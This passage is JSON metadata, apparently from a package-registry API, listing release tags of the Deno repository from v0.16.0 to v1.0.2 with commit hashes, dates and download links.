2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F